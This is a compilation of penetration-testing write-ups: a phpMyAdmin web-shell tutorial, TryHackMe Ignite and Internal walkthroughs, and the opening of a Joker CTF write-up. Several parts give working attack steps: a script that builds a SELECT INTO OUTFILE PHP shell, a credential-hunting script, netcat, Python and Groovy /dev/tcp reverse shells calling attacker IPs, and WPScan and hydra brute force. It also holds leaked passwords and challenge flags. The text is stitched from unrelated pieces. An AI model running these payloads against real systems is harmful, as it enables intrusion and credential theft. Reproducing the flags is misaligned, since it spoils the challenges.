Protected: htb-openkeys-nl

Protected: htb-jewel-nl

Protected: htb-reel2-nl

Protected: htb-doctor-nl

shell-uploading-web-server-phpmyadmin

In this tutorial we will learn how to exploit a web server when its phpMyAdmin panel has been left exposed. Here I exploit phpMyAdmin running inside a local XAMPP install: a SQL query writes malicious code into the web root, and from there we work towards a shell on the victim’s PC.

phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc.) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features

  • Intuitive web interface
  • Support for most MySQL features:
    • browse and drop databases, tables, views, fields, and indexes
    • create, copy, drop, rename and alter databases, tables, fields, and indexes
    • maintain servers, databases, and tables, with proposals on server configuration
    • execute, edit and bookmark any SQL statement, even batch queries
    • manage MySQL user accounts and privileges
    • manage stored procedures and triggers
  • Import data from CSV and SQL
  • Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 – OpenDocument Text and Spreadsheet, Word, LaTeX, and others
  • Administering multiple servers
  • Creating graphics of your database layout in various formats
  • Creating complex queries using Query-by-example (QBE)
  • Searching globally in a database or a subset of it
  • Transforming stored data into any format using a set of predefined functions, like displaying BLOB data as an image or download link

For information visit: https://www.phpmyadmin.net

Let’s start!!!

Open the XAMPP dashboard at 192.168.1.101:81 in the browser and select phpMyAdmin from the XAMPP menu, as shown in the following screenshot.

Once inside the phpMyAdmin application you will find several areas. On the left side of the screen is the list of database names. Since we are in the administration console, where we can perform all the tasks listed above, I am going to create a new database.

Click on New to create a database.

Give your database a name (I used “Ignite technologies”) and click Create.

The database “ignite technologies” now appears in the list of databases.

Click the “ignite technologies” database to build a MySQL query inside it, then open the SQL tab, where you can enter the SQL query.

Now comes the interesting part: I am going to execute malicious PHP code through a SQL query, which writes a command shell into the web server’s document root.

In the following screenshot you can see the malicious PHP code entered as a SQL query; click Go to execute it.

Now open the URL of the new file in the browser to check whether the OS command shell was created.

Awesome!!! The page returns a PHP warning, which means the file exists and is being executed: the OS command shell is in place.

Requesting that URL with a directory-listing command returns the directory listing of the victim’s PC.

The next step is to obtain a meterpreter session on the victim’s PC. Open another terminal in Kali Linux and start Metasploit:

msfconsole

Copy the highlighted part of the module output (the payload one-liner Metasploit generates) and use it as the command inside the URL.

Paste that code into the URL and execute it; this returns a meterpreter session in Metasploit.

From the following screenshot, you can see meterpreter session 1 opened.
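The query itself, as an added worked example (this is not the tutorial’s code; the tutorial’s query appears only in a screenshot): the standard way to drop a shell from an exposed phpMyAdmin is SELECT ... INTO OUTFILE, which requires the MySQL FILE privilege (XAMPP’s root account has it, and no password by default) and is refused when secure_file_priv is NULL or points at another directory. The script below builds that statement, interprets the secure_file_priv value, and, for the defender, flags such writes in MySQL’s general query log. The XAMPP web root, the file name backdoor.php and the log lines are assumptions.

```python
"""Added example (not code from the tutorial): build the SELECT ... INTO
OUTFILE statement that drops a PHP web shell through an exposed phpMyAdmin
SQL tab, check it against secure_file_priv, and flag such writes in
MySQL's general query log. Web root, file name and log lines are assumed."""
import re
from typing import List, Optional

# Minimal PHP command shell: executes whatever arrives in ?cmd=.
PHP_SHELL = "<?php system($_GET['cmd']); ?>"


def mysql_escape(text: str) -> str:
    """Escape a value for a single-quoted MySQL string literal
    (assumes an sql_mode without NO_BACKSLASH_ESCAPES)."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def outfile_query(webroot: str, filename: str, php: str = PHP_SHELL) -> str:
    """Statement to paste into phpMyAdmin's SQL tab. MySQL accepts forward
    slashes on Windows, so the XAMPP default C:/xampp/htdocs works as is."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]+\.php", filename):
        raise ValueError("filename must be a plain .php name")
    path = webroot.rstrip("/") + "/" + filename
    return f"SELECT '{mysql_escape(php)}' INTO OUTFILE '{mysql_escape(path)}'"


def outfile_allowed(secure_file_priv: Optional[str], target_path: str) -> bool:
    """Interpret the value of SHOW VARIABLES LIKE 'secure_file_priv':
    NULL disables INTO OUTFILE entirely, '' allows any path mysqld can
    write, and a directory confines writes to that directory."""
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return False
    if secure_file_priv == "":
        return True
    base = secure_file_priv.replace("\\", "/").rstrip("/") + "/"
    return target_path.replace("\\", "/").startswith(base)


# Constructed MySQL general-log lines (not captured from a real server).
GENERAL_LOG = """\
2020-06-01T10:00:01.000000Z\t   12 Query\tSHOW DATABASES
2020-06-01T10:00:05.000000Z\t   12 Query\tSELECT '<?php system($_GET[\\'cmd\\']); ?>' INTO OUTFILE 'C:/xampp/htdocs/backdoor.php'
2020-06-01T10:00:09.000000Z\t   13 Query\tSELECT * FROM users INTO OUTFILE '/var/lib/mysql-files/export.csv'
"""

WEB_ROOT_MARKERS = ("/var/www/", "/htdocs/", "/wwwroot/")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".jsp", ".aspx")
FILE_WRITE_RE = re.compile(r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']+)'", re.IGNORECASE)


def suspicious_file_writes(log_text: str) -> List[str]:
    """Paths written by INTO OUTFILE/DUMPFILE that land in a web root or
    carry a server-side script extension; ordinary CSV exports pass."""
    hits = []
    for line in log_text.splitlines():
        m = FILE_WRITE_RE.search(line)
        if not m:
            continue
        path = m.group(1).replace("\\", "/").lower()
        if any(mark in path for mark in WEB_ROOT_MARKERS) or path.endswith(SCRIPT_EXTS):
            hits.append(path)
    return hits
```

Two practical points: INTO OUTFILE refuses to overwrite an existing file, so a second attempt needs a new file name rather than a retry, and the shell is then driven with a request of the form backdoor.php?cmd=... (the exact URL the tutorial used is only in its screenshot).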

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

thm-ignite-nl

Description: A new start-up has a few issues with their web server.

Free room , Difficulty: Easy

https://tryhackme.com/room/ignite


Nmap

>:sudo nmap -sC -sV 'machine-ip'

This is the scan I use most of the time: -sC runs the default Nmap scripts and -sV reports the version of every service found on the open ports. My results were:

Nmap scan result

The only open port is 80 (HTTP). The website runs a content management system (CMS) named Fuel CMS.

GoBuster

To enumerate the machine further I scan it for directories, including hidden ones, using GoBuster with the machine’s IP address and a wordlist of commonly used directory names:

>:gobuster dir -u http://'machine-ip' -w /usr/share/dirb/wordlists/common.txt

GoBuster scan result

A lot of directories! I went through all of them, and one useful result was “/fuel”, which turns out to be a login page.

Login page of fuelCMS

CMSs tend to have a lot of weak points, so let’s look on exploit-db for an exploit against Fuel CMS.

Search result on exploit-db

One result, for CVE-2018-16763, gives us Remote Code Execution against the CMS. I downloaded the script and set the URL to the target’s IP address, then marked it as executable and ran it. The output contained errors, mostly because of the proxy: to make the exploit work I had to comment out the proxy entries. The exploit script should then look like this:

https://github.com/puckiestyle/python/blob/master/fuelcms141rce.py

Entering the command whoami gives the output www-data.

Command execution

Further down there are still some errors, but the desired output is at the top.

Privilege Escalation

Because I can now execute commands, I enter the code for a reverse shell. To catch the connection we first have to set up a netcat listener:

>:nc -lnvp 443

Now we can enter our reverse shell code (bash or python, choose whichever you like):

>:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.3.122 443 >/tmp/f
>:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.3.122",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And then stabilized my current shell with:

>:python -c 'import pty; pty.spawn("/bin/bash")'

Note: I found out that the su command used later on needs a terminal, so stabilizing the shell is essential to reach the solution.

Then I read the “user.txt” file (*1). Next I searched for backups, because those tend to contain valuable information:

>:find / -type f -name "*.bak" 2>/dev/null

The 2>/dev/null at the end discards the “permission denied” errors for files I am not allowed to read.

After looking around, I found the root password in /var/www/html/fuel/application/config/database.php.

password

root: mememe

So we have found the password for the root user (the database password is reused for the system account), and we can now switch to root with the su command.

root-shell-1

After this you can just get the root flag from /root.
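How to hunt for such files systematically, as an added example that is not part of the original write-up: the script walks a web tree for well-known config and backup file names and pulls out credential assignments, which is the manual find and cat step above done in one pass. It builds a throwaway directory tree imitating the Ignite layout (constructed data; only the mememe value comes from the box) so it runs offline; the file name list and regexes are my assumptions.

```python
"""Added example, not part of the original write-up: after landing as
www-data, hunt the web tree for config files holding database
credentials, the way the root password turned up in Fuel CMS's
database.php. The directory tree built below is constructed for the demo."""
import os
import re
import shutil
import tempfile
from typing import Dict, List, Tuple

# File names that commonly carry DB credentials; *.bak picks up forgotten
# backups, the idea behind the write-up's find / -name "*.bak".
CONFIG_NAMES = re.compile(r"(database\.php|wp-config\.php|configuration\.php|\.env|.*\.bak)$")

# Assignment styles found in PHP, ini and .env files:
#   'password' => 'x'   $db['password'] = 'x'   define('DB_PASSWORD', 'x')   DB_PASSWORD=x
CRED_RE = re.compile(
    r"""['"]?(?P<key>(?:db_)?(?:user(?:name)?|pass(?:word)?|hostname|database))['"]?\]?
        \s*(?:=>|=|,)\s*
        (?:'(?P<sq>[^']*)'|"(?P<dq>[^"]*)"|(?P<bare>[^\s'";]+))""",
    re.IGNORECASE | re.VERBOSE,
)


def find_credentials(root: str) -> List[Tuple[str, Dict[str, str]]]:
    """Walk root; return (path, {key: value}) for each config file with at
    least one credential-looking assignment. Unreadable files are skipped,
    the same effect as the write-up's 2>/dev/null."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not CONFIG_NAMES.match(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            found = {}
            for m in CRED_RE.finditer(text):
                value = next(v for v in (m.group("sq"), m.group("dq"), m.group("bare")) if v is not None)
                found[m.group("key").lower()] = value
            if found:
                hits.append((path, found))
    return sorted(hits)


def build_demo_tree() -> str:
    """Throwaway web root mimicking the Ignite box (constructed data)."""
    root = tempfile.mkdtemp(prefix="htdocs_")
    cfg = os.path.join(root, "fuel", "application", "config")
    os.makedirs(cfg)
    with open(os.path.join(cfg, "database.php"), "w") as fh:
        fh.write("<?php\n$db['default'] = array(\n\t'dsn'\t=> '',\n"
                 "\t'hostname' => 'localhost',\n\t'username' => 'root',\n"
                 "\t'password' => 'mememe',\n\t'database' => 'fuel_schema',\n);\n")
    with open(os.path.join(root, "wp-config.php.bak"), "w") as fh:
        fh.write("define( 'DB_USER', 'wpuser' );\ndefine( 'DB_PASSWORD', 'Sup3r' );\n")
    with open(os.path.join(root, ".env"), "w") as fh:
        fh.write("APP_ENV=local\nDB_USERNAME=app\nDB_PASSWORD=s3cret\n")
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php // 'password' => 'decoy' lives in a non-config file\n")
    return root


def hunt_demo() -> Dict[str, Dict[str, str]]:
    """Build the tree, hunt it, clean up; keys are paths relative to root."""
    root = build_demo_tree()
    try:
        return {os.path.relpath(p, root).replace(os.sep, "/"): creds
                for p, creds in find_credentials(root)}
    finally:
        shutil.rmtree(root, ignore_errors=True)
```

Run find_credentials("/var/www") from the www-data shell; the file-name filter is what keeps the output short, and the decoy index.php shows why grepping every file for “password” is noisier than it looks.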

Summary

1. User.txt
– 6470e394cbf6dab6a91682cc8585059b

2. Root.txt
– b9bbcb33e11b80be759c4e844862482d

Author : Puckiestyle

thm-internal-nl

Internal

free room available at : https://tryhackme.com/room/internal

Penetration Testing Challenge

Having accepted the project, you are provided with the client assessment environment. Secure the User and Root flags and submit them to the dashboard as proof of exploitation.

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks.

Scope of Work

The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Ensure that you modify your hosts file to reflect internal.thm
  • Any tools or techniques are permitted in this engagement
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope

(Roleplay off)

I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnsecurity eCPPT or career as a penetration tester in the field.

Note – this room can be completed without Metasploit

User.txt Flag

Services enumeration

Let’s start to enumerate the services with Nmap. We discover 2 ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web enumeration (gobuster)

There is no robots.txt file, but gobuster found a blog, likely running WordPress.

kali@kali:/data/The_Blob_Blog/files$ gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://internal.thm
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/03 14:28:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/blog (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/09/03 14:29:00 Finished
===============================================================

WordPress enumeration

Browsing /blog confirms our assumption, this is a WordPress blog. Let’s enumerate the users with wpscan:

kali@kali:/data/The_Blob_Blog/files$ wpscan --url http://internal.thm/blog -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.137.187]
[+] Started: Thu Sep  3 14:36:16 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Thu Sep  3 14:36:20 2020
[+] Requests Done: 24
[+] Cached Requests: 34
[+] Data Sent: 5.936 KB
[+] Data Received: 181.104 KB
[+] Memory used: 172.43 MB
[+] Elapsed time: 00:00:03

According to WPScan, the only user is admin. Let’s try to brute force the password, using the bruteforce feature of WPScan:

kali@kali:/data/The_Blob_Blog/files$ wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt 

[REDACTED]

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[REDACTED]

WordPress admin connection

Login (http://internal.thm/blog/wp-admin/) is successful with admin:my2boys, and we now have the ability to modify the theme’s PHP source code. This is convenient for writing a reverse shell.

In the web interface, go to “Appearance > Theme Editor > 404.php” and replace the PHP code with a PHP reverse shell (e.g. http://pentestmonkey.net/tools/web-shells/php-reverse-shell).

Open a listener (rlwrap nc -nlvp 4444) and call the template (http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php).

Reverse shell

We now have a reverse shell:

$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.137.187] 51322
Linux internal 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:46:33 up 23 min,  0 users,  load average: 0.02, 0.20, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@internal:/$ whoami
whoami
www-data

Lateral move (www-data to aubreanna)

There is an interesting file in the /opt directory:

cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

Let’s connect as aubreanna:

www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$ whoami
whoami
aubreanna

User flag

The user flag is in aubreanna’s home folder:

aubreanna@internal:/opt$ cd /home/aubreanna
cd /home/aubreanna
aubreanna@internal:~$ ls -la
ls -la
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug  3 03:57 .
drwxr-xr-x 3 root      root      4096 Aug  3 01:40 ..
-rwx------ 1 aubreanna aubreanna    7 Aug  3 20:01 .bash_history
-rwx------ 1 aubreanna aubreanna  220 Apr  4  2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr  4  2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug  3 01:41 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug  3 19:36 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug  3 01:53 .local
-rwx------ 1 root      root       223 Aug  3 01:56 .mysql_history
-rwx------ 1 aubreanna aubreanna  807 Apr  4  2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug  3 02:38 .ssh
-rwx------ 1 aubreanna aubreanna    0 Aug  3 01:41 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna   55 Aug  3 03:57 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3 01:41 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3 03:56 user.txt
aubreanna@internal:~$ cat user.txt
cat user.txt
THM{int3rna1_fl4g_1}

User flag: THM{int3rna1_fl4g_1}

Root.txt Flag

Check privileges

To read the root flag, we will need a privilege escalation. Unfortunately, aubreanna is not in the sudoers.

aubreanna@internal:~$ sudo -l
Sorry, user aubreanna may not run sudo on internal.

Jenkins

There is an interesting file in aubreanna’s home folder that tells us Jenkins is running on port 8080:

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

We confirm that the service is only available to localhost.

aubreanna@internal:~$ netstat -tan | grep 8080
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN

There are several indications that Docker is available on the target, and since the Jenkins documentation (https://www.jenkins.io/doc/book/installing/) explains how to install Jenkins with Docker, we can assume that this is how it was installed. Unless it is a rabbit hole, this could be a way to elevate our privileges to root. Worth trying…

To make Jenkins reachable from our machine instead of only from the target, we can use an SSH local port forward:

┌─[user@parrot-virtual]─[/usr/bin]
└──╼ $ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.227.191
The authenticity of host '10.10.227.191 (10.10.227.191)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.227.191' (ECDSA) to the list of known hosts.
aubreanna@10.10.227.191's password: bubb13guM!@#123
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Sep 9 17:09:10 UTC 2020

System load: 0.01 Processes: 112
Usage of /: 63.7% of 8.79GB Users logged in: 0
Memory usage: 34% IP address for eth0: 10.10.227.191
Swap usage: 0% IP address for docker0: 172.17.0.1

=> There is 1 zombie process.


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug 3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$ netstat -tan | grep 8080
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 
aubreanna@internal:~$

We can then open the Jenkins web page from our Parrot box at http://127.0.0.1:8080.

Jenkins’ admin password

Trying to authenticate as admin with admin or password as password fails. Let’s try to brute force the account.

To do that, intercept the POST request in Burp Suite to build our hydra attack.

POST /j_acegi_security_check HTTP/1.1
Host: internal.thm:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://internal.thm:8888/login?from=%2F
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: JSESSIONID.fb3308f2=node0lfk0eau5l4zu17h43ifl0scpw36.node0
Upgrade-Insecure-Requests: 1

j_username=admin&j_password=admin&from=%2F&Submit=Sign+in

We now have all the required information. Here is the hydra attack:

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-09 18:31:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[8080][http-post-form] host: localhost login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-09 18:32:22
┌─[user@parrot-virtual]─[~/ptd]

We now have the admin’s password. Let’s log in to Jenkins through the tunnel (http://127.0.0.1:8080; the Burp capture above was taken through a forward on port 8888) with admin:spongebob.

Reverse shell in docker

Now that we have an admin access to Jenkins, we can run commands, and we’ll ultimately exploit this to have a reverse shell.

Start by running a listener (on your machine):

$ rlwrap nc -nlvp 5555

Now, in Jenkins, go to “Jenkins > Nodes > master” and click on “Script Console” in the menu. Execute the following Groovy script, which connects back to our listener:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.8.50.72/5555;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Root password

In our listener, we now have a reverse shell. Browsing the file system reveals that the root password is disclosed in clear:

cd /opt
ls -la
total 12
drwxr-xr-x 1 root root 4096 Aug  3 03:31 .
drwxr-xr-x 1 root root 4096 Aug  3 03:07 ..
-rw-r--r-- 1 root root  204 Aug  3 03:31 note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:tr0ub13guM!@#123

Root flag

Back to our initial SSH connection as aubreanna:

aubreanna@internal:/var/backups$ su root
Password: 
root@internal:/var/backups# cd /root/
root@internal:~# ll
total 48
drwx------  7 root root 4096 Aug  3 13:16 ./
drwxr-xr-x 24 root root 4096 Aug  3 01:31 ../
-rw-------  1 root root  193 Aug  3 20:01 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 Aug  3 02:23 .cache/
drwx------  3 root root 4096 Aug  3 02:23 .gnupg/
drwxr-xr-x  3 root root 4096 Aug  3 01:53 .local/
-rw-------  1 root root 1071 Aug  3 13:16 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Aug  3 01:40 .ssh/
-rw-r--r--  1 root root   22 Aug  3 04:13 root.txt
drwxr-xr-x  3 root root 4096 Aug  3 01:41 snap/
root@internal:~# cat root.txt 
THM{d0ck3r_d3str0y3r}

Root flag: THM{d0ck3r_d3str0y3r}

thm-jokerctf-nl

Batman hits Joker.

We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

  1. Enumerate Services
     • Nmap
  2. Bruteforce
     • Performing Bruteforce on files over http
     • Performing Bruteforce on Basic Authentication
  3. Hash Crack
     • Performing Bruteforce on hash to crack zip file
     • Performing Bruteforce on hash to crack mysql user
  4. Exploitation
     • Getting a reverse connection
     • Spawning a TTY Shell
  5. Privilege Escalation
     • Get root taking advantage of flaws in LXD

#1 – Enumerate services on target machine.

Hint: What about nmap?

Let’s start with a Nmap scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
|   256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_  256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open  http    Apache httpd 2.4.29
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals 3 open ports on the server, 1 for SSH and 2 for HTTP.

#2 – What version of Apache is it?

Answer: 2.4.29

#3 – What port on this machine does not need to be authenticated by user and password?

Only the HTTP service running on port 80 doesn’t require an authentication.

Answer: 80

#4 – There is a file on this port that seems to be secret, what is it?

Hint: Extensions File, dirb command comes with a flag that append each word with this extensions. Try to use dirb with a file that contains some commons extensions in a web server.

$ gobuster dir -u http://10.10.130.207 -w /data/src/wordlists/common.txt -x txt,php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.130.207
[+] Threads:        10
[+] Wordlist:       /data/src/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
